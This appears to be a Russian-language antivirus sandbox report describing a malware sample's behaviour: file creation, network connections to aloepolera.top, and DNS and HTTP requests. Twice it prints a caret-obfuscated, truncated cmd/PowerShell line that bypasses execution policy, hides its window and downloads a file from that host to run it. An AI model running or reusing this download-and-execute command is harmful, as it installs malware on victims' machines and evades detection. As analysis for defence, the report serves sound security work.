Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "pO^WErsh^El^l.ex^e^ -Exe^C^u^tIONPOLi^cy ^BYPa^ss^ ^-^NOPROF^iL^e -WiN^doW^s^TY^Le ^hI^D^dE^n^ ^(^N^EW-^o^BjECt SYs^tem^.NEt.we^bcL^iE^n^T)^.Do^WNLOa^d^fIl^e^('http://aloepolera.to...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'al###olera.top':80
TCP
Запросы HTTP GET
- http://al###olera.top/read.php?f=#####
UDP
- DNS ASK al###olera.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "pO^WErsh^El^l.ex^e^ -Exe^C^u^tIONPOLi^cy ^BYPa^ss^ ^-^NOPROF^iL^e -WiN^doW^s^TY^Le ^hI^D^dE^n^ ^(^N^EW-^o^BjECt SYs^tem^.NEt.we^bcL^iE^n^T)^.Do^WNLOa^d^fIl^e^('http://aloepolera.to...' (со скрытым окном)
